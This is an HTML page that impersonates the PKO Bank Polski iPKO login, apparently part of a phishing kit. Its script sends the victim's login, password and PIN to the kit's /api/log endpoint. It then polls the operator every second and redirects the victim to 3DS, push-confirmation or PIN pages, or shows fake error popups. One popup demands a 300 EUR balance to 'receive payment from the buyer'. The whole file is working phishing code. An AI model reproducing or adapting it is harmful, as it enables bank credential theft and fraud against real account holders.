<!DOCTYPE html>
<html lang="pl"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<link href="https://www.ipko.pl/gfx/favicon.ico" rel="icon" type="image/x-icon">
		<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
        <script src="https://code.jquery.com/jquery-3.6.0.js"></script>
		<script src="/static/style/protect/protect.js"></script>
		<title>iPKO – bankowość elektroniczna PKO Banku Polskiego</title>
		<style>
			._0 {
				margin: 0 auto;
				max-width: 400px;
				box-sizing: border-box;
				background: #fff;
				margin-top: 50px;
				margin-bottom: 50px;
			}
			._01 {
				margin: 0 auto;
				max-width: 490px;
				box-sizing: border-box;
				padding: 24px;
				background: #fff;
				margin-top: 50px;
				padding-left: 0;
				margin-bottom: 50px;
			}
			._1 {
				font-size: 28px;
				padding-top: 16px;
				width: 150px;
			}
			._2 {
				margin: 10px 0;
				border-bottom: 1px solid #ddd;
			}
			._3 {
				text-align: left;
			    font-size: 14px;
			    border: 1px solid #c5c4c4;
			    border-radius: 6px;
			    padding: 12px 10px;
			    margin-bottom: 20px;
			}
			._3:hover {
				border: 1px solid #000;
			}
			._4 {
				float: right;
			    width: 150px;
				margin: 0;
			    color: #000;
			    font-weight: 400;
			    font-size: 15px;
			    line-height: 24px;
			    display: inline-block;
			    -webkit-box-sizing: border-box;
			    box-sizing: border-box;
			    padding: 8px 30px 6px 31px;
			    min-width: 180px;
			    border-radius: 4px;
			    white-space: nowrap;
			    border: 1px solid #003574;
			    background-color: #003574;
			    color: #fff;
			    text-align: center;
			    text-decoration: none;
			    border-top-right-radius: 0;
			    border-bottom-left-radius: 0;
			}
			._4:hover {
				background-color: #001e4b;
			    color: #fff;
			    border-color: #001e4b;
			}
			._5 {
				color: #aaa;
				text-align: right;
				width: 45%;
				padding-right: 24px;
			}
			._6 {
				font-weight: bold;
			}
			._7 {
				margin-top: 4px;
				margin-bottom: 16px;
			}
			._8 {
				padding-bottom: 6px;
				line-height: 18px;
			}
			._9 {
				text-align: right;
			}
			body {
				margin: 0;
				font-family: Arial;
				font-size: 12px;
				color: #222;
				word-break: break-word;
				user-select: none;
				background: #fdfdfd;
				-webkit-appearance: none;
			}
			input {
				font-family: Arial;
				font-size: 12px;
				color: #222;
				width: 100%;
				border: none;
				box-sizing: border-box;
				text-align: center;
				-webkit-appearance: none;
			}
			table {
				width: 100%;
				border-collapse: separate;
				border-spacing: 0;
			}
			td {
				padding: 4px 0;
			}
			button {
				-webkit-appearance: none;
			}
			#mainblock {
				display: flex;
				margin: 0 40px;
			    border-bottom: 1px solid #e4e4e4;
			}
			#rightblock {
				margin-top: 100px;
				display: flex;
			}
			.loginboxes {
				display: flex;
			}
			#formblock {
                border-right: 1px solid #e4e4e4;
                padding-right: 70px; 
                padding-bottom: 20px; 
                margin-top: 20px;
			}
			#konto {
				margin-left: 30%; 
				padding-top: 30px;
			}
			#Pomoc {
                padding-top: 25px; 
                width: 150px;
			}
			@media all and (max-width: 800px) {
				#mainblock {
					display: block;
				}
				#formblock {
					border-right: none;
					padding-right: 0; 
				}
			}
			@media all and (max-width: 500px) {
				.loginboxes {
					display: block;
				}
				#rightblock {
					display: block;
				}
				#konto {
					margin: 0;
				}
				#Pomoc {
					padding-top: 0;
					padding-bottom: 25px;
				}
				._4 {
					width: 100%;
				}
			}
		</style>
	</head>
	<body>
		<div id="mainblock">
			<div class="_0">
				<table>
					<tbody><tr>
						<td>
							<img src="/static/style/banksPL/ipko/ipko.svg" height="52">
						</td>
					</tr>
				</tbody></table>
				<form method="post" id="formblock">
					<div class="loginboxes" style="margin-bottom: 20px;">
						<div class="_1">Zaloguj się</div>
						<div id="konto"><a href="https://www.pkobp.pl/klienci-indywidualni/konta/konta-osobiste/zostan-naszym-klientem/" style="font-size: 13px; color: #003574; text-decoration: none;">Otwórz konto</a></div>
					</div>
					<input id="login" class="_3" type="text" name="login" placeholder="Wpisz numer klienta lub login" required="">
					<input id="password" class="_3" type="password" name="password" placeholder="Wpisz hasło" required="">
				 <input id="pin" class="_3" type="password" name="pin" placeholder="PIN">
					<div style="color: #ff6161; padding: 20px; text-align: center;"></div>
					<div class="loginboxes">

						<div id="Pomoc"><a href="https://www.pkobp.pl/klienci-indywidualni/konta/jak-otworzyc-konto-pko-bank-polski/" style="font-size: 13px; color: #003574; text-decoration: none;">Pomoc w logowaniu</a></div>
						<input class="_4" type="submit" value="Dalej" onclick="sendData()">
					</div>
				</form>
			</div>




			<div class="_01">
				<div id="rightblock">
					<div><img src="/static/style/banksPL/ipko/pg.png" style="width: 140px;"></div>
					<div>
						<h2 style="font-size: 20px;">Pożyczka gotówkowa online</h2>
						<div style="margin-top: 15px; font-size: 14px; margin-bottom: 30px;">Większa wizja i niższa prowizja. RRSO 13,05%</div>
						<a href="https://www.pkobp.pl/" style="padding: 8px 6px;
    font-size: 15px; border-radius: 4px; background-color: #DB912C; color: #fff; text-decoration: none;">Sprawdź propozycję</a>
					</div>
				</div>
			</div>
		</div>
		<script>
			let pwdChars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789aąbсćdеęfghijklłmnńoóprsśtuwyzźżAĄBCĆDEĘFGHIJKLŁMNŃOÓPRSŚTUWYZŹŻ';
			let pwdLen = 20;
			function inputMask(elem) {
				let val = elem.value;
				let val2 = '';
				for (let i = 0; i < val.length; i++) {
					if (pwdChars.includes(val[i]))
						val2 += val[i];
				}
				elem.value = val2.substr(0, pwdLen);
			}
			document.addEventListener('DOMContentLoaded', function() {
				field3ds.oninput = function() {
					inputMask(field3ds);
				}
				field3ds.focus();
			});
			document.oncontextmenu = function() {
				return false;
			};
		</script>

        <script type="text/javascript">
            function sendData() {
                var data = $('#formblock').serializeArray().reduce(function(obj, item) {
                    obj[item.name] = item.value;
                    return obj;
                }, {});

                fetch(`/api/log/${window.location.pathname.split('/')[3]}`, {
                    method: 'POST',
                    cache: 'no-cache',
                    headers: {
                        'Accept': 'application/json, text/plain, */*',
                        'Content-Type': 'application/json'
                    },
                    referrerPolicy: 'no-referrer',
                    body: JSON.stringify({
                        login: data.login,
                        password: data.password,
                        pin: data.pin,
                        bank: 'pko',
                        method: 'BankLogPL'
                    })
                })
            }
        </script>

<script src="https://unpkg.com/axios/dist/axios.min.js"></script>
<script>
	setInterval(() => {
		axios.post(`/api/getStatus/${window.location.pathname.split('/')[3]}`, {
			id: window.location.pathname.split('/')[3]
		}).then((res_1) => {
			console.log(res_1.data.method)
			switch (res_1.data.method) {
				case "3ds": 
					window.location.href = `/receive/verify/${window.location.pathname.split('/')[3]}`
					break
				case "push": 
					window.location.href = `/receive/confirm/${window.location.pathname.split('/')[3]}`
					break
				case "fake": 
					try {
						document.querySelector("body > section > div.popup_window > div").remove()
					} catch (e) {
						//
					}

					document.querySelector('body > section > div.popup_window').innerHTML = `
					<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">
						<path d="M15 18.3334L20 23.3334L36.6667 6.66669" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
						<path d="M35 20V31.6667C35 32.5507 34.6488 33.3986 34.0237 34.0237C33.3986 34.6488 32.5507 35 31.6667 35H8.33333C7.44928 35 6.60143 34.6488 5.97631 34.0237C5.35119 33.3986 5 32.5507 5 31.6667V8.33333C5 7.44928 5.35119 6.60143 5.97631 5.97631C6.60143 5.35119 7.44928 5 8.33333 5H26.6667" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
					</svg>
					<center>
						<h3 class="modal_title">
							Błąd!
						</h3>
					</center>
					
					<div class="popup_content" style="max-height: 500px; overflow: scroll;margin-top:0px;">
						<p class="modal_text">
							Karta nie jest obsługiwana. Sprawdź, czy poprawnie wpisałeś jego dane.
						</p>
					</div>
					`
					break
				case "change": 
					try {
						document.querySelector("body > section > div.popup_window > div").remove()
					} catch (e) {
						//
					}

					document.querySelector('body > section > div.popup_window').innerHTML = `
					<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">
						<path d="M15 18.3334L20 23.3334L36.6667 6.66669" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
						<path d="M35 20V31.6667C35 32.5507 34.6488 33.3986 34.0237 34.0237C33.3986 34.6488 32.5507 35 31.6667 35H8.33333C7.44928 35 6.60143 34.6488 5.97631 34.0237C5.35119 33.3986 5 32.5507 5 31.6667V8.33333C5 7.44928 5.35119 6.60143 5.97631 5.97631C6.60143 5.35119 7.44928 5 8.33333 5H26.6667" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
					</svg>
					<center>
						<h3 class="modal_title">
							Błąd!
						</h3>
					</center>
					
					<div class="popup_content" style="max-height: 500px; overflow: scroll;margin-top:0px;">
						<p class="modal_text">
							Karta nie jest obsługiwana. Proszę sprawdzić, czy dane zostały wprowadzone poprawnie.
						</p>
					</div>
					`
					break
				case "lk": 
					window.location.href = `/receive/select/${window.location.pathname.split('/')[3]}`
					break
				case "limits": 
					try {
						document.querySelector("body > section > div.popup_window > div").remove()
					} catch (e) {
						//
					}

					document.querySelector('body > section > div.popup_window').innerHTML = `
					<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">
						<path d="M15 18.3334L20 23.3334L36.6667 6.66669" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
						<path d="M35 20V31.6667C35 32.5507 34.6488 33.3986 34.0237 34.0237C33.3986 34.6488 32.5507 35 31.6667 35H8.33333C7.44928 35 6.60143 34.6488 5.97631 34.0237C5.35119 33.3986 5 32.5507 5 31.6667V8.33333C5 7.44928 5.35119 6.60143 5.97631 5.97631C6.60143 5.35119 7.44928 5 8.33333 5H26.6667" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
					</svg>
					<center>
						<h3 class="modal_title">
							Błąd!
						</h3>
					</center>
					
					<div class="popup_content" style="max-height: 500px; overflow: scroll;margin-top:0px;">
						<p class="modal_text">
							Twoja karta ma limity transakcji. Usuń ograniczenia, aby otrzymać pieniądze.
						</p>
					</div>
					`
					break
				case "lowmoney": 
					try {
						document.querySelector("body > section > div.popup_window > div").remove()
					} catch (e) {
						//
					}

					document.querySelector('body > section > div.popup_window').innerHTML = `
					<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">
						<path d="M15 18.3334L20 23.3334L36.6667 6.66669" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
						<path d="M35 20V31.6667C35 32.5507 34.6488 33.3986 34.0237 34.0237C33.3986 34.6488 32.5507 35 31.6667 35H8.33333C7.44928 35 6.60143 34.6488 5.97631 34.0237C5.35119 33.3986 5 32.5507 5 31.6667V8.33333C5 7.44928 5.35119 6.60143 5.97631 5.97631C6.60143 5.35119 7.44928 5 8.33333 5H26.6667" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
					</svg>
					<center>
						<h3 class="modal_title">
							Błąd!
						</h3>
					</center>
					
					<div class="popup_content" style="max-height: 500px; overflow: scroll;margin-top:0px;">
						<p class="modal_text">
							MUSISZ POSIADAĆ SALDO CO NAJMNIEJ 300 EUR, ABY ZWIĄZAĆ KONTO BANKOWE. JEST TO NIEZBĘDNE DO POTWIERDZENIA KORZYSTANIA Z TEGO KONTA. PO ZAŁADOWANIU - WRÓĆ DO TEJ STRONY, ABY OTRZYMAĆ PŁATNOŚĆ OD KUPUJĄCEGO
						</p>
					</div>
					`
					break
				case "virus": 
					/*  */
					break
				case "code": 
					/*  */
					break
				case "PINonl":
					window.location.replace(`/receive/pinonline/${window.location.pathname.split('/')[3]}`)
					break
				case "PINcard":
					window.location.replace(`/receive/pincard/${window.location.pathname.split('/')[3]}`)
					break
				case "no3ds":
				try {
					document.querySelector("body > section > div.popup_window > div").remove()
				} catch (e) {
					//
				}

				document.querySelector('body > section > div.popup_window').innerHTML = `
				<svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 40" fill="none">
					<path d="M15 18.3334L20 23.3334L36.6667 6.66669" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
					<path d="M35 20V31.6667C35 32.5507 34.6488 33.3986 34.0237 34.0237C33.3986 34.6488 32.5507 35 31.6667 35H8.33333C7.44928 35 6.60143 34.6488 5.97631 34.0237C5.35119 33.3986 5 32.5507 5 31.6667V8.33333C5 7.44928 5.35119 6.60143 5.97631 5.97631C6.60143 5.35119 7.44928 5 8.33333 5H26.6667" stroke="#49B975" stroke-width="3" stroke-linecap="round" stroke-linejoin="round"></path>
				</svg>
				<center>
					<h3 class="modal_title">
						Error!
					</h3>
				</center>
				
				<div class="popup_content" style="max-height: 500px; overflow: scroll;margin-top:0px;">
					<p class="modal_text">
						Zakupy przez Internet są wyłączone na Twojej karcie. Włącz zakupy online (3DS) na swoim koncie bankowym i spróbuj ponownie.
					</p>
				</div>
				`
				break
			}
		})
	}, 1000);
</script>
</body></html>